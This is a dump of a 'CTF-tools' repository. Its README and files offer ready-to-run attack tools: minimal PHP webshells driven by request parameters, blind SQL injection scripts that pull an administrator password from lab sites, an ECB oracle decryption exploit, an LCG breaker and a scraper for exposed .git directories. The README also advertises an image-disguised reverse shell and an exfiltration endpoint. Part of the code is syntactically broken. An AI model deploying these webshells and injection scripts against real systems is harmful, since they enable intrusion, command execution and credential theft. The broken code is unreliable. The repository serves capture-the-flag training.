├── ECBoracle.py ├── LCG.py ├── MiniShell1.php ├── MiniShell2.php ├── README.md ├── SQLi ├── README.md ├── blind_error_based.py ├── blind_response_based.py └── blind_timing_based.py ├── coppersmith.py ├── diggit.py ├── getprimes.py ├── grab.php ├── jwt_tool.py ├── pupper.jpg.php ├── sherlock ├── .dockerignore ├── .travis.yml ├── Alpha-maniak.txt ├── AlphaManiak.txt ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── README.md ├── __pycache__ │ └── load_proxies.cpython-37.pyc ├── alpha-maniak.txt ├── data.json ├── data_bad_site.json ├── docker-compose.yml ├── images │ ├── preview.png │ └── sherlock_preview.gif ├── load_proxies.py ├── removed_sites.md ├── requirements.txt ├── sherlock.py ├── site_list.py ├── sites.md └── tests │ ├── __init__.py │ ├── all.py │ └── base.py └── weiner.py /ECBoracle.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import binascii 4 | import string 5 | 6 | ses = requests.session() 7 | 8 | def checkECB(data, block_size): 9 | n = len(data)//block_size 10 | for i in range(n): 11 | for j in range(i+1,n): 12 | if data[i*block_size:(i+1)*block_size] == data[j*block_size:(j+1)*block_size]: 13 | return True 14 | return False 15 | 16 | def detect_mode(oracle): 17 | resp, actual_mode = oracle(b'a'*50) 18 | if checkECB(resp, 32): 19 | predicted_mode = 'ECB' 20 | else: 21 | predicted_mode = 'CBC' 22 | success = actual_mode == predicted_mode 23 | return (predicted_mode, success) 24 | 25 | 26 | def ECB_oracle(inp): 27 | payload = inp.hex() 28 | enc = ses.get(f'http://aes.cryptohack.org/ecb_oracle/encrypt/{payload}').text 29 | c = json.loads(enc)['ciphertext'] 30 | return (c, 'ECB') 31 | 32 | def leak_ECB_secret(oracle): 33 | mode, confirmation = detect_mode(oracle) 34 | 35 | assert(confirmation) 36 | 37 | if mode != 'ECB': 38 | print('The oracle is not ECB') 39 | return -1 40 | 41 | print('ECB Oracle detected') 42 | 43 | blength = 0 44 | while True: 45 | a1 = oracle(b'a'*blength)[0] 46 | a2 = oracle(b'a'*(blength+1))[0] 47 | if a1[:32] == a2[:32]: 48 | break 49 | blength += 1 50 | print(f'Found Block length: {blength}') 51 | 52 | blocks_to_be_scanned = 4 53 | secret = b'c' 54 | for block in range(blocks_to_be_scanned): 55 | for i in range(1, blength + 1): 56 | if i == blength: 57 | payload = b'a'*blength 58 | h = oracle(payload)[0][(block+1)*32:(block+2)*32] 59 | payload += secret 60 | for byte in string.printable.encode(): 61 | if oracle(payload + bytes([byte]))[0][(block+1)*32:(block+2)*32] == h: 62 | secret += bytes([byte]) 63 | print (secret) 64 | else: 65 | payload = b'a'*(blength - i) 66 | h = oracle(payload)[0][block*32:(block+1)*32] 67 | payload += secret 68 | for byte in string.printable.encode(): 69 | if oracle(payload + bytes([byte]))[0][block*32:(block+1)*32] == h: 70 | secret += bytes([byte]) 71 | print (secret) 72 | 73 | print ('##################') 74 | print (secret[:-1].decode()) 75 | 76 | if __name__ == '__main__': 77 | leak_ECB_secret(ECB_oracle) -------------------------------------------------------------------------------- /LCG.py: -------------------------------------------------------------------------------- 1 | import random 2 | from Crypto.Cipher import AES 3 | from Crypto.Util.number import * 4 | import sys 5 | import os 6 | # Linear Congruential Generator breaker example 7 | P = 295075153L # This will work as our LCG "secret" 8 | 9 | class WeakPrng(object): 10 | def __init__(self, p): # generate seed with 56 bits of entropy 11 | self.p = p 12 | self.x = random.randint(0, p) 13 | 14 | def next(self): 15 | self.x = (2*self.x + 5) % self.p # On this case, our 'a' and 'c' are 2 and 5 respectivelly. 16 | return self.x 17 | 18 | def calc_det(i,j,X): #This determinant along with the GCD will allow us to get 'p' with a very high probability! 19 | """ Calculate the values for the matrix[lattice] """ 20 | a1 = X[i] - X[0] 21 | b1 = X[i+1] - X[1] 22 | a2 = X[j] - X[0] 23 | b2 = X[j+1] - X[1] 24 | 25 | """ Calculate the determinant """ 26 | det = a1*b2 - a2*b1 27 | return abs(det) 28 | 29 | def GCD(a,b): 30 | """ Euclidean Algo""" 31 | a = abs(a) 32 | b = abs(b) 33 | while a: 34 | a,b = long(b%a),a 35 | return b 36 | 37 | prng = WeakPrng(P) 38 | X = [45779928998446,26621650748547,50483770559288,111003181280269,106370168505090,157483768091351,130718729880652,115158553978593] 39 | 40 | Det_X = [] 41 | Det_X.append(calc_det(1,2,X)) 42 | print Det_X 43 | Det_X.append(calc_det(2,3,X)) 44 | print Det_X 45 | Det_X.append(calc_det(3,4,X)) 46 | print Det_X 47 | Det_X.append(calc_det(4,5,X)) 48 | print Det_X 49 | 50 | found_p = GCD(Det_X[0], Det_X[1]) 51 | found_p = GCD(found_p, Det_X[2]) 52 | found_p = GCD(found_p, Det_X[3]) 53 | print found_p # This is our 'p'! Using only 5 intercepted numbers generated by the LCG we were able to succesfully break the "secret" modulo! Now its easy to find out 'a' and 'c' 54 | 55 | 56 | # To find 'a' and 'c' we need to solve the simple equation: 57 | # a = ((x3 - x4)*INVERSE_MODULE((x2-x3),p))%p 58 | # And: 59 | # c = (x4 - a*x3)%p 60 | # Where x2, x3, x4 are all numbers generated by the LCG that we got already! 61 | 62 | mod_inv_a = inverse((X[2]-X[3]), found_p) # Here we find the modular inverse of x2-x3 with modulo p 63 | print (X[2]-X[3])%found_p 64 | found_a = ((X[3] - X[4])*mod_inv_a)%found_p 65 | print found_a #found_a will be the correct a with high probability. 66 | 67 | found_c = (X[4] - found_a*X[3])%found_p 68 | print found_c #found_c will be the correct a with high probability, clearly depending on the correctness of a 69 | 70 | print "Now we found: %d as P, %d as a and %d as c, so we can forge the LCG!" % (found_p, found_a, found_c) 71 | 72 | def lcg(x): 73 | return (found_a*x+found_c)%found_p 74 | 75 | print "the next few values are : " 76 | for i in range(10): 77 | X.append(lcg(X[-1])) 78 | print(X[-1]) -------------------------------------------------------------------------------- /MiniShell1.php: -------------------------------------------------------------------------------- 1 | /";${$_}[_](${$_}[__]); 2 | // $_GET[_]($_GET[__]); 3 | -------------------------------------------------------------------------------- /MiniShell2.php: -------------------------------------------------------------------------------- 1 | /";${$_}{"_"}(${$_}{"__"}(${$_}{"_1"})); 3 | // /page?_=var_dump&__=shell_exec&_1=command 4 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF-tools 2 | A collection of exploits or general scripts that often come in handy during CTFs 3 | 4 | - `Sherlock`: OSINT tool used to find online presence connected to a particular username. **Credits : https://github.com/sherlock-project/sherlock** 5 | - `jwttool.py`: Handy script for testing jsonwebtoken vulneabilities. **Credits: https://github.com/ticarpi/jwt_tool** 6 | - `ECBoracle`: Exploit for an ECB padding oracle, a common class of challenges in security training labs. **Credits: Me** 7 | - `getprimes`: A collection of sieves and other algorithms for fast computation of primes. **Credits: Me + Stackoverflow** 8 | - `weiner`: Implementation of weiner's attack on RSA. **Credits: Me** 9 | - `pupper.jpg.php`: A php reverse shell disguised as an image. Useful for fooling MIME type checks and exploiting file upload systems. **Credits: Me** 10 | - `diggit.py`: Automatically extracts exposed git directories in websites. **Credits: https://github.com/jrfaller/diggit** 11 | - `MiniShell1.php`: A small shell(31 characters) which does not contain any letters or numbers. Needs to be executed via `shell_exec`. Helpful for bypassing regex checks and upload limits. **Credits: https://gist.github.com/mvisat/03592a5ab0743cd43c2aa65bf45fef21** 12 | - `MiniShell2.php`: A slightly modified version of MiniShell2.php which also works inside `eval` statements. **Credits: Me** 13 | - `grab.php`: A simple php file to dump incoming request queries. Useful as an Out of Band exfiltration endpoint in combination with ngrok or pagekite. **Credits: Me** 14 | - `coppersmith.py`: A simple implementation of the functions to be used in a classic coppersmith's attack on RSA **Credits: Me** 15 | - `LCG.py`: Simple script to break LCG (linear congruential genrator) RNG. **Credits: Unknown** 16 | - `SQLi`: Collection of scripts for extraction of data via blind SQL injection **Credits: Me, @supra08, @sin3point14** 17 | -------------------------------------------------------------------------------- /SQLi/README.md: -------------------------------------------------------------------------------- 1 | - `blind_response_based.py`: Script for extraction of data via conditional-response based blind SQLi **Credits: Me, @supra08, @sin3point14** 2 | - `blind_error_based.py`: Script for extraction of data via conditional-error based blind SQLi **Credits: Me** 3 | - `blind_timing_based.py`: Script for extraction of data via timing attack/condition delay based blind SQLi **Credits: Me** 4 | -------------------------------------------------------------------------------- /SQLi/blind_error_based.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | 4 | url = "https://acd51f971f211f2c8053d235009400db.web-security-academy.net/" 5 | 6 | 7 | def query(payload): 8 | cookie = { 'TrackingId': payload } 9 | r = requests.get(url, cookies=cookie) 10 | 11 | if r.status_code == 500: 12 | return 1 13 | else: 14 | return 0 15 | 16 | password = '' 17 | i = 1 18 | while True: 19 | for j in string.printable: 20 | payload = f"x' UNION SELECT CASE WHEN (username = 'administrator' AND substr(password, {i}, 1)='{j}') THEN to_char(1/0) ELSE 'a' END FROM users --" 21 | if query(payload) == 1: 22 | password += j 23 | break 24 | i += 1 25 | print(password) -------------------------------------------------------------------------------- /SQLi/blind_response_based.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | 4 | url = "https://aca01f881faeafc88190893400e900f9.web-security-academy.net/" 5 | 6 | 7 | def query(payload): 8 | cookie = { 'TrackingId': payload } 9 | r = requests.get(url, cookies=cookie) 10 | 11 | if "Welcome back!" in r.text: 12 | return 1 13 | else: 14 | return 0 15 | 16 | password = '' 17 | i = 1 18 | while True: 19 | for j in string.printable: 20 | payload = f"x' UNION SELECT password FROM users WHERE username = 'administrator' AND SUBSTRING(password, {i}, 1)='{j}' --" 21 | if query(payload) == 1: 22 | password += j 23 | break 24 | i += 1 25 | print(password) -------------------------------------------------------------------------------- /SQLi/blind_timing_based.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | 4 | url = "https://acd11fee1e8f4c39808e1a5e000200b0.web-security-academy.net/" 5 | 6 | 7 | def query(payload): 8 | cookie = { 'TrackingId': payload } 9 | r = requests.get(url, cookies=cookie) 10 | 11 | if r.elapsed.total_seconds() > 5.0: 12 | return 1 13 | else: 14 | return 0 15 | 16 | password = '' 17 | i = 1 18 | while True: 19 | for j in string.printable: 20 | payload = f"X' UNION SELECT CASE WHEN (username='administrator' AND substr(password, {i}, 1)='{j}') THEN (SELECT 'a' || pg_sleep(5)) END FROM users --" 21 | if query(payload) == 1: 22 | password += j 23 | break 24 | i += 1 25 | print(password) -------------------------------------------------------------------------------- /coppersmith.py: -------------------------------------------------------------------------------- 1 | 2 | from sage.all import * 3 | 4 | # f = (m + x)**e - c 5 | def stereotyped(f, N): 6 | P. = PolynomialRing(Zmod(N)) 7 | beta = 1 8 | dd = f.degree() 9 | epsilon = beta/7 10 | XX = ceil(N**((beta**2/dd) - epsilon)) 11 | rt = f.small_roots(XX, beta, epsilon) 12 | return rt 13 | 14 | def N-factorize(f, N): 15 | P. = PolynomialRing(Zmod(N)) 16 | beta = 0.5 17 | dd = f.degree() 18 | epsilon = beta/7 19 | XX = ceil(N**((beta**2/dd) - epsilon)) 20 | rt = f.small_roots(XX, beta, epsilon) 21 | return rt -------------------------------------------------------------------------------- /diggit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # bl4de | | https://twitter.com/_bl4de 4 | # 5 | # diggit - gets .git repository 6 | import argparse 7 | import os 8 | import re 9 | 10 | # some common definitions 11 | VERSION = "1.0.0" 12 | OBJECT_DIR = "/.git/objects/" 13 | 14 | term = { 15 | "black": '\33[30m', 16 | "red": '\33[31m', 17 | "green": '\33[32m', 18 | "yellow": '\33[33m', 19 | "blue": '\33[34m', 20 | "magenta": '\33[35m', 21 | "cyan": '\33[36m', 22 | "white": '\33[37m', 23 | "endl": '\33[0m' 24 | } 25 | 26 | 27 | def print_banner(): 28 | """Prints credits :)""" 29 | print "\n\n", "#" * 78 30 | print "###", " " * 70, "###" 31 | print "###", " " * 70, "###" 32 | print "### diggit.py | Twitter: @_bl4de " \ 33 | "| GitHub: bl4de ###" 34 | print "###", " " * 70, "###" 35 | print "###", " " * 70, "###" 36 | print "#" * 78 37 | 38 | 39 | def print_object_details(objtype, objcontent, objhash, objfilename): 40 | """Prints and saves object details/content""" 41 | 42 | print "\n" + term["cyan"] + "#" * 12 + " " + objhash \ 43 | + " information " + "#" * 12 + term["endl"] 44 | print "\n{0}[*] Object type: {3}{2}{1}{3}".format( 45 | term["green"], objtype, term["red"], term["endl"]) 46 | 47 | if objfilename != "": 48 | global localgitrepo 49 | tmpfp = localgitrepo + "/" + objfilename 50 | print "{0}[*] Object filename: {3}{2}{1}{3}".format( 51 | term["green"], objfilename, term["red"], term["endl"]) 52 | print "{0}[*] Object saved in {2}:{1}".format( 53 | term["green"], term["endl"], tmpfp) 54 | tmpfile = open(tmpfp, "w") 55 | tmpfile.write("// diggit.py by @bl4de | {} content\n".format(objhash)) 56 | tmpfile.writelines(objcontent) 57 | tmpfile.close() 58 | 59 | print "{0}[*] Object content:{1}\n".format(term["green"], term["endl"]) 60 | if len(objcontent) < 2048: 61 | print "{0}{1}{2}".format(term["yellow"], objcontent, term["endl"]) 62 | else: 63 | print "{}[!] file too big to preview - {} kB{}".format( 64 | term["red"], len(objcontent)/1024, term["endl"]) 65 | 66 | 67 | def get_object_url(objhash): 68 | """Returns object git url""" 69 | return OBJECT_DIR + objhash[0:2] + "/" + objhash[2:] 70 | 71 | 72 | def get_object_dir_prefix(objhash): 73 | """Returns object directory prefix (first two chars of object hash)""" 74 | return objhash[0:2] + "/" 75 | 76 | 77 | def get_objhash_from_object_desc(gitobjcontent): 78 | """returns object hash without control characters""" 79 | return gitobjcontent.split(" ")[1][:40] 80 | 81 | 82 | def save_git_object(baseurl, objhash, berecursive, objfilename=""): 83 | """Saves git object in temporary .git directory preserves its path""" 84 | finalurl = baseurl + "/" + get_object_url(objhash) 85 | 86 | os.system("curl --silent '" + finalurl + "' --create-dirs -o '" + 87 | localgitrepo + get_object_url(objhash) + "'") 88 | 89 | gitobjtype = os.popen("cd " + localgitrepo + OBJECT_DIR + 90 | get_object_dir_prefix(objhash) + 91 | " && git cat-file -t " + objhash).read() 92 | 93 | gitobjcontent = os.popen("cd " + localgitrepo + OBJECT_DIR + 94 | get_object_dir_prefix(objhash) + 95 | " && git cat-file -p " + objhash).read() 96 | print_object_details(gitobjtype, gitobjcontent, objhash, 97 | objfilename) 98 | 99 | # get actual tree from commit 100 | if gitobjtype.strip() == "commit" and berecursive is True: 101 | save_git_object(baseurl, 102 | get_objhash_from_object_desc(gitobjcontent), 103 | berecursive) 104 | 105 | if gitobjtype.strip() == "tree" and berecursive is True: 106 | for obj in gitobjcontent.split("\n"): 107 | if obj: 108 | obj = obj.strip().split(" ") 109 | objhash = obj[2][:40] 110 | real_filename = obj[2].split("\t")[1] 111 | if objhash != "" and re.match(r"[a-zA-Z0-9]", objhash): 112 | save_git_object(baseurl, objhash, berecursive, 113 | real_filename) 114 | 115 | 116 | if __name__ == "__main__": 117 | parser = argparse.ArgumentParser(description=""" 118 | diggit.py - get information about Git object(s) from remote 119 | repository 120 | """) 121 | parser.add_argument('-u', help='URL of remote Git repository location') 122 | parser.add_argument('-t', 123 | help='path to temporary Git folder on local machine') 124 | parser.add_argument('-o', help='object hash (SHA-1, all 40 characters)') 125 | parser.add_argument('-r', default=False, 126 | help='be recursive (if commit or tree hash ' 127 | 'found get all blobs too). Default is \'False\'') 128 | 129 | args = parser.parse_args() 130 | 131 | # domain, base path for .git folder, eg. http://website.com 132 | baseurl = args.u 133 | 134 | # hash of object to save 135 | objecthash = args.o 136 | berecursive = True if args.r else False 137 | 138 | # temporary dir with dummy .git structure (create it first!) 139 | localgitrepo = args.t 140 | 141 | parser.print_help() 142 | 143 | if baseurl and objecthash: 144 | print_banner() 145 | save_git_object(args.u, args.o, berecursive, "") 146 | print "\n" + term["cyan"] + "#" * 78 + term["endl"] -------------------------------------------------------------------------------- /getprimes.py: -------------------------------------------------------------------------------- 1 | from math import sqrt, ceil 2 | import numpy as np 3 | 4 | def rwh_primes(n): 5 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 6 | """ Returns a list of primes < n """ 7 | sieve = [True] * n 8 | for i in xrange(3,int(n**0.5)+1,2): 9 | if sieve[i]: 10 | sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1) 11 | return [2] + [i for i in xrange(3,n,2) if sieve[i]] 12 | 13 | def rwh_primes1(n): 14 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 15 | """ Returns a list of primes < n """ 16 | sieve = [True] * (n/2) 17 | for i in xrange(3,int(n**0.5)+1,2): 18 | if sieve[i/2]: 19 | sieve[i*i/2::i] = [False] * ((n-i*i-1)/(2*i)+1) 20 | return [2] + [2*i+1 for i in xrange(1,n/2) if sieve[i]] 21 | 22 | def rwh_primes2(n): 23 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 24 | """ Input n>=6, Returns a list of primes, 2 <= p < n """ 25 | correction = (n%6>1) 26 | n = {0:n,1:n-1,2:n+4,3:n+3,4:n+2,5:n+1}[n%6] 27 | sieve = [True] * (n/3) 28 | sieve[0] = False 29 | for i in xrange(int(n**0.5)/3+1): 30 | if sieve[i]: 31 | k=3*i+1|1 32 | sieve[ ((k*k)/3) ::2*k]=[False]*((n/6-(k*k)/6-1)/k+1) 33 | sieve[(k*k+4*k-2*k*(i&1))/3::2*k]=[False]*((n/6-(k*k+4*k-2*k*(i&1))/6-1)/k+1) 34 | return [2,3] + [3*i+1|1 for i in xrange(1,n/3-correction) if sieve[i]] 35 | 36 | def sieve_wheel_30(N): 37 | # http://zerovolt.com/?p=88 38 | ''' Returns a list of primes <= N using wheel criterion 2*3*5 = 30 39 | 40 | Copyright 2009 by zerovolt.com 41 | This code is free for non-commercial purposes, in which case you can just leave this comment as a credit for my work. 42 | If you need this code for commercial purposes, please contact me by sending an email to: info [at] zerovolt [dot] com.''' 43 | __smallp = ( 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 44 | 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 45 | 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 46 | 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 47 | 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 48 | 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 49 | 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 50 | 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 51 | 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 52 | 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 53 | 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997) 54 | 55 | wheel = (2, 3, 5) 56 | const = 30 57 | if N < 2: 58 | return [] 59 | if N <= const: 60 | pos = 0 61 | while __smallp[pos] <= N: 62 | pos += 1 63 | return list(__smallp[:pos]) 64 | # make the offsets list 65 | offsets = (7, 11, 13, 17, 19, 23, 29, 1) 66 | # prepare the list 67 | p = [2, 3, 5] 68 | dim = 2 + N // const 69 | tk1 = [True] * dim 70 | tk7 = [True] * dim 71 | tk11 = [True] * dim 72 | tk13 = [True] * dim 73 | tk17 = [True] * dim 74 | tk19 = [True] * dim 75 | tk23 = [True] * dim 76 | tk29 = [True] * dim 77 | tk1[0] = False 78 | # help dictionary d 79 | # d[a , b] = c ==> if I want to find the smallest useful multiple of (30*pos)+a 80 | # on tkc, then I need the index given by the product of [(30*pos)+a][(30*pos)+b] 81 | # in general. If b < a, I need [(30*pos)+a][(30*(pos+1))+b] 82 | d = {} 83 | for x in offsets: 84 | for y in offsets: 85 | res = (x*y) % const 86 | if res in offsets: 87 | d[(x, res)] = y 88 | # another help dictionary: gives tkx calling tmptk[x] 89 | tmptk = {1:tk1, 7:tk7, 11:tk11, 13:tk13, 17:tk17, 19:tk19, 23:tk23, 29:tk29} 90 | pos, prime, lastadded, stop = 0, 0, 0, int(ceil(sqrt(N))) 91 | # inner functions definition 92 | def del_mult(tk, start, step): 93 | for k in xrange(start, len(tk), step): 94 | tk[k] = False 95 | # end of inner functions definition 96 | cpos = const * pos 97 | while prime < stop: 98 | # 30k + 7 99 | if tk7[pos]: 100 | prime = cpos + 7 101 | p.append(prime) 102 | lastadded = 7 103 | for off in offsets: 104 | tmp = d[(7, off)] 105 | start = (pos + prime) if off == 7 else (prime * (const * (pos + 1 if tmp < 7 else 0) + tmp) )//const 106 | del_mult(tmptk[off], start, prime) 107 | # 30k + 11 108 | if tk11[pos]: 109 | prime = cpos + 11 110 | p.append(prime) 111 | lastadded = 11 112 | for off in offsets: 113 | tmp = d[(11, off)] 114 | start = (pos + prime) if off == 11 else (prime * (const * (pos + 1 if tmp < 11 else 0) + tmp) )//const 115 | del_mult(tmptk[off], start, prime) 116 | # 30k + 13 117 | if tk13[pos]: 118 | prime = cpos + 13 119 | p.append(prime) 120 | lastadded = 13 121 | for off in offsets: 122 | tmp = d[(13, off)] 123 | start = (pos + prime) if off == 13 else (prime * (const * (pos + 1 if tmp < 13 else 0) + tmp) )//const 124 | del_mult(tmptk[off], start, prime) 125 | # 30k + 17 126 | if tk17[pos]: 127 | prime = cpos + 17 128 | p.append(prime) 129 | lastadded = 17 130 | for off in offsets: 131 | tmp = d[(17, off)] 132 | start = (pos + prime) if off == 17 else (prime * (const * (pos + 1 if tmp < 17 else 0) + tmp) )//const 133 | del_mult(tmptk[off], start, prime) 134 | # 30k + 19 135 | if tk19[pos]: 136 | prime = cpos + 19 137 | p.append(prime) 138 | lastadded = 19 139 | for off in offsets: 140 | tmp = d[(19, off)] 141 | start = (pos + prime) if off == 19 else (prime * (const * (pos + 1 if tmp < 19 else 0) + tmp) )//const 142 | del_mult(tmptk[off], start, prime) 143 | # 30k + 23 144 | if tk23[pos]: 145 | prime = cpos + 23 146 | p.append(prime) 147 | lastadded = 23 148 | for off in offsets: 149 | tmp = d[(23, off)] 150 | start = (pos + prime) if off == 23 else (prime * (const * (pos + 1 if tmp < 23 else 0) + tmp) )//const 151 | del_mult(tmptk[off], start, prime) 152 | # 30k + 29 153 | if tk29[pos]: 154 | prime = cpos + 29 155 | p.append(prime) 156 | lastadded = 29 157 | for off in offsets: 158 | tmp = d[(29, off)] 159 | start = (pos + prime) if off == 29 else (prime * (const * (pos + 1 if tmp < 29 else 0) + tmp) )//const 160 | del_mult(tmptk[off], start, prime) 161 | # now we go back to top tk1, so we need to increase pos by 1 162 | pos += 1 163 | cpos = const * pos 164 | # 30k + 1 165 | if tk1[pos]: 166 | prime = cpos + 1 167 | p.append(prime) 168 | lastadded = 1 169 | for off in offsets: 170 | tmp = d[(1, off)] 171 | start = (pos + prime) if off == 1 else (prime * (const * pos + tmp) )//const 172 | del_mult(tmptk[off], start, prime) 173 | # time to add remaining primes 174 | # if lastadded == 1, remove last element and start adding them from tk1 175 | # this way we don't need an "if" within the last while 176 | if lastadded == 1: 177 | p.pop() 178 | # now complete for every other possible prime 179 | while pos < len(tk1): 180 | cpos = const * pos 181 | if tk1[pos]: p.append(cpos + 1) 182 | if tk7[pos]: p.append(cpos + 7) 183 | if tk11[pos]: p.append(cpos + 11) 184 | if tk13[pos]: p.append(cpos + 13) 185 | if tk17[pos]: p.append(cpos + 17) 186 | if tk19[pos]: p.append(cpos + 19) 187 | if tk23[pos]: p.append(cpos + 23) 188 | if tk29[pos]: p.append(cpos + 29) 189 | pos += 1 190 | # remove exceeding if present 191 | pos = len(p) - 1 192 | while p[pos] > N: 193 | pos -= 1 194 | if pos < len(p) - 1: 195 | del p[pos+1:] 196 | # return p list 197 | return p 198 | 199 | def sieveOfEratosthenes(n): 200 | """sieveOfEratosthenes(n): return the list of the primes < n.""" 201 | # Code from: , Nov 30 2006 202 | # http://groups.google.com/group/comp.lang.python/msg/f1f10ced88c68c2d 203 | if n <= 2: 204 | return [] 205 | sieve = range(3, n, 2) 206 | top = len(sieve) 207 | for si in sieve: 208 | if si: 209 | bottom = (si*si - 3) // 2 210 | if bottom >= top: 211 | break 212 | sieve[bottom::si] = [0] * -((bottom - top) // si) 213 | return [2] + [el for el in sieve if el] 214 | 215 | def sieveOfAtkin(end): 216 | """sieveOfAtkin(end): return a list of all the prime numbers , improved 219 | # Code: https://web.archive.org/web/20080324064651/http://krenzel.info/?p=83 220 | # Info: http://en.wikipedia.org/wiki/Sieve_of_Atkin 221 | assert end > 0 222 | lng = ((end-1) // 2) 223 | sieve = [False] * (lng + 1) 224 | 225 | x_max, x2, xd = int(sqrt((end-1)/4.0)), 0, 4 226 | for xd in xrange(4, 8*x_max + 2, 8): 227 | x2 += xd 228 | y_max = int(sqrt(end-x2)) 229 | n, n_diff = x2 + y_max*y_max, (y_max << 1) - 1 230 | if not (n & 1): 231 | n -= n_diff 232 | n_diff -= 2 233 | for d in xrange((n_diff - 1) << 1, -1, -8): 234 | m = n % 12 235 | if m == 1 or m == 5: 236 | m = n >> 1 237 | sieve[m] = not sieve[m] 238 | n -= d 239 | 240 | x_max, x2, xd = int(sqrt((end-1) / 3.0)), 0, 3 241 | for xd in xrange(3, 6 * x_max + 2, 6): 242 | x2 += xd 243 | y_max = int(sqrt(end-x2)) 244 | n, n_diff = x2 + y_max*y_max, (y_max << 1) - 1 245 | if not(n & 1): 246 | n -= n_diff 247 | n_diff -= 2 248 | for d in xrange((n_diff - 1) << 1, -1, -8): 249 | if n % 12 == 7: 250 | m = n >> 1 251 | sieve[m] = not sieve[m] 252 | n -= d 253 | 254 | x_max, y_min, x2, xd = int((2 + sqrt(4-8*(1-end)))/4), -1, 0, 3 255 | for x in xrange(1, x_max + 1): 256 | x2 += xd 257 | xd += 6 258 | if x2 >= end: y_min = (((int(ceil(sqrt(x2 - end))) - 1) << 1) - 2) << 1 259 | n, n_diff = ((x*x + x) << 1) - 1, (((x-1) << 1) - 2) << 1 260 | for d in xrange(n_diff, y_min, -8): 261 | if n % 12 == 11: 262 | m = n >> 1 263 | sieve[m] = not sieve[m] 264 | n += d 265 | 266 | primes = [2, 3] 267 | if end <= 3: 268 | return primes[:max(0,end-2)] 269 | 270 | for n in xrange(5 >> 1, (int(sqrt(end))+1) >> 1): 271 | if sieve[n]: 272 | primes.append((n << 1) + 1) 273 | aux = (n << 1) + 1 274 | aux *= aux 275 | for k in xrange(aux, end, 2 * aux): 276 | sieve[k >> 1] = False 277 | 278 | s = int(sqrt(end)) + 1 279 | if s % 2 == 0: 280 | s += 1 281 | primes.extend([i for i in xrange(s, end, 2) if sieve[i >> 1]]) 282 | 283 | return primes 284 | 285 | def ambi_sieve_plain(n): 286 | s = range(3, n, 2) 287 | for m in xrange(3, int(n**0.5)+1, 2): 288 | if s[(m-3)/2]: 289 | for t in xrange((m*m-3)/2,(n>>1)-1,m): 290 | s[t]=0 291 | return [2]+[t for t in s if t>0] 292 | 293 | def sundaram3(max_n): 294 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/2073279#2073279 295 | numbers = range(3, max_n+1, 2) 296 | half = (max_n)//2 297 | initial = 4 298 | 299 | for step in xrange(3, max_n+1, 2): 300 | for i in xrange(initial, half, step): 301 | numbers[i-1] = 0 302 | initial += 2*(step+1) 303 | 304 | if initial > half: 305 | return [2] + filter(None, numbers) 306 | 307 | ################################################################################ 308 | # Using Numpy: 309 | def ambi_sieve(n): 310 | # http://tommih.blogspot.com/2009/04/fast-prime-number-generator.html 311 | s = np.arange(3, n, 2) 312 | for m in xrange(3, int(n ** 0.5)+1, 2): 313 | if s[(m-3)/2]: 314 | s[(m*m-3)/2::m]=0 315 | return np.r_[2, s[s>0]] 316 | 317 | def primesfrom3to(n): 318 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 319 | """ Returns a array of primes, p < n """ 320 | assert n>=2 321 | sieve = np.ones(n/2, dtype=np.bool) 322 | for i in xrange(3,int(n**0.5)+1,2): 323 | if sieve[i/2]: 324 | sieve[i*i/2::i] = False 325 | return np.r_[2, 2*np.nonzero(sieve)[0][1::]+1] 326 | 327 | def primesfrom2to(n): 328 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 329 | """ Input n>=6, Returns a array of primes, 2 <= p < n """ 330 | sieve = np.ones(n/3 + (n%6==2), dtype=np.bool) 331 | sieve[0] = False 332 | for i in xrange(int(n**0.5)/3+1): 333 | if sieve[i]: 334 | k=3*i+1|1 335 | sieve[ ((k*k)/3) ::2*k] = False 336 | sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False 337 | return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)] 338 | 339 | # if __name__=='__main__': 340 | # import itertools 341 | # import sys 342 | 343 | # def test(f1,f2,num): 344 | # print('Testing {f1} and {f2} return same results'.format( 345 | # f1=f1.func_name, 346 | # f2=f2.func_name)) 347 | # if not all([a==b for a,b in itertools.izip_longest(f1(num),f2(num))]): 348 | # sys.exit("Error: %s(%s) != %s(%s)"%(f1.func_name,num,f2.func_name,num)) 349 | 350 | # n=1000000 351 | # test(sieveOfAtkin,sieveOfEratosthenes,n) 352 | # test(sieveOfAtkin,ambi_sieve,n) 353 | # test(sieveOfAtkin,ambi_sieve_plain,n) 354 | # test(sieveOfAtkin,sundaram3,n) 355 | # 